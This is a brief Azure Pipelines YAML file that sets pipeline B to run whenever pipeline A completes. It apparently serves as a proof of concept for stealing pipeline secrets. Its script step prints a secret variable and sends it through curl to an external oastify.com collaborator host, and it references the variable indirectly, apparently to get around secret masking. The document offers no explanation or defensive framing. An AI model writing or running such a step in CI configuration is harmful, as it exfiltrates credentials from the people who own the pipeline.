trigger: none
pr: none

resources:
  pipelines:
  - pipeline: pipeline (B)
    source: pipeline (A)
    trigger: true # Run pipeline (B) when any run of pipeline (A) completes
    branch: main

steps:    
  - script: |
      echo $(SUPER_SECRET)
      $var = "SUPER_SECRET"
      curl https://rupx4un8zwdy1729e272k46xqowfk58u.oastify.com?secret=$($(var))
  
